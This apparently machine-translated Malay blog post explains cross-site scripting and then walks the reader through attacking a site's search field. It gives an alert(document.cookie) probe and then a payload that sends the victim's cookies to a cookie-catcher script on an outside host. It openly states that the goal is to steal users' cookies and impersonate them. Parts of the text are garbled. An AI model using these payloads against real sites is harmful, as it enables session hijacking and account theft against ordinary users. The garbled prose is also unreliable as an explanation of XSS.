Cross-Site Scripting
Cross-site scripting (XSS) adalah sejenis kelemahan keselamatan komputer biasanya ditemui dalam aplikasi web yang direka oleh pengedit HTML . Disebabkan pelanggaran keselamatan pelayar , XSS membolehkan penyerang untuk menyuntik client-side skrip ke dalam laman web yang dilihat oleh pengguna lain. Satu kelemahan cross-site scripting boleh digunakan oleh penyerang untuk memintas kawalan akses seperti polisi asal yang sama.
Majoriti .
Matlamat akhir pengguna yang berniat jahat adalah untuk mencuri cookies pengguna tapak, supaya anda kemudian boleh menyamar mereka.
Laman ini telah dimuatkan cookies apabila komputer anda, jika anda memuat semula halaman yang anda harus melihat kaunter di atas kenaikan halaman.
Kod :
(script)alert(document.cookie)(/script)
PESANAN : Anda perlu untuk menukar () tag skrip ke <> untuk melaksanakan kod. Hanya menggunakan kod HTML untuk tag skrip .
Klik SEARCH . Jika anda melihat popup javascript bermakna vulnarable XSS. Langkah seterusnya :
Kod :
(script)document.location="www.examplecom/cookie catcher.php?c=" + document.cookie(/script)
PESANAN : Anda perlu untuk menukar () tag skrip ke <> untuk melaksanakan kod. Hanya menggunakan kod HTML untuk tag skrip .
0 comments:
Post a Comment